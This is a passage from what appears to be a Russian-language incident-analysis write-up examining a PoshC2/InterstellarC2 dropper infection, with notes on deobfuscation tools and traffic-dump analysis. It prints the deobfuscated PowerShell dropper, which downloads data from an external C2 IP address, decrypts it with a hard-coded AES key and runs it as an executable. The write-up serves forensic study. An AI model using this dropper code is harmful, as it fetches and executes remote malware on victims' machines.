InterstellarC2. Разбираем последствия заражения дроппером PoshC2 - «Новости»

PDF).

Для деоб­фуска­ции мож­но пой­ти нес­коль­кими путями: вос­поль­зовать­ся инс­тру­мен­том PSDecode, исполь­зовать жур­нал Windows при вклю­чен­ном ауди­те сце­нари­ев PowerShell, ну или поп­росить разоб­рать­ся ChatGPT, который тоже уме­ет деоб­фусци­ровать, хоть иног­да и меня­ет исходный код на свое усмотре­ние.

Я вос­поль­зуюсь PSDecode. Пос­ле деоб­фуска­ции получа­ем исходный сце­нарий (некото­рые стро­ки я под­пра­вил вруч­ную):

Set-Variable -Namel60Yu3 -Value ([type]('System.Security.Cryptography.AesCryptoServiceProvider'))Set-Variable -NameBI34 -Value ([type]('System.Security.Cryptography.CryptoStream'))$Url = 'http://64.226.84.200/94974f08-5853-41ab-938a-ae1bd86d8e51'$PTF = "$env:temp94974f08-5853-41ab-938a-ae1bd86d8e51"Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $pathInvoke-WebRequest -Uri $Url -OutFile $PTF$Fs =New-Object -TypeName 'System.IO.FileStream'($PTF, ([System.IO.FileMode]::Open))$MS =New-Object -TypeName 'System.IO.MemoryStream'$aes = [System.Security.Cryptography.AesCryptoServiceProvider]::Create()$aes.KeySize = 128
$KEY = [byte[]](0,1,1,0,0,1,1,0,0,1,1,0,1,1,0,0)$iv = [byte[]](0,1,1,0,0,0,0,1,0,1,1,0,0,1,1,1)$aes.Key = $KEY$aes.IV = $iv$cs =New-Object -TypeName 'System.Security.Cryptography.CryptoStream'($MS, $aes.CreateDecryptor(), ([System.Security.Cryptography.CryptoStreamMode]::Write))$fs.CopyTo($cs)$decD = $MS.ToArray()$CS.Write($decD, 0, $decD.Length)$decD| Out-File -Path "$env:temptmp7102591.exe" -EncodingByte
&"$env:temptmp7102591.exe"

Ста­новит­ся понят­нее. Если корот­ко: PowerShell здесь при помощи сис­темной служ­бы Windows BitsTransfer (T1197 по мат­рице ATT&CK) дан­ные с C2-сер­вера заг­ружа­ются на ском­про­мети­рован­ный хост, пос­ле чего заг­ружен­ные дан­ные рас­шифро­выва­ются по алго­рит­му AES-CBC-128. Для рас­шифров­ки AES c CBC-mode необ­ходимы ключ и век­тор ини­циали­зации, они как раз и ука­заны в сце­нарии.

Рас­шифро­ван­ные бай­ты записы­вают­ся в исполня­емый файл $env:temptmp7102591.exe, а затем этот файл запус­кает­ся. Наша пер­вооче­ред­ная цель — рас­шифро­вать дан­ные и записать их в исполня­емый файл для даль­нейше­го изу­чения. Это поможет узнать, что про­исхо­дило на эта­пе зак­репле­ния.

Для дешиф­ровки можем вос­поль­зовать­ся тем же сце­нари­ем или инс­тру­мен­том CyberChef (но это более тру­доем­кий спо­соб).

Из зна­чения перемен­ной $Url в сце­нарии сле­дует, что рас­шифро­вывать нуж­но поток бай­тов в дам­пе тра­фика с име­нем 94974f08-5853-41ab-938a-ae1bd86d8e51.

info

Что­бы убе­дить­ся, что работа ведет­ся с вер­ным пакетом, номер пакета мож­но сопос­тавить с номером экспор­тиру­емо­го объ­екта Wireshark.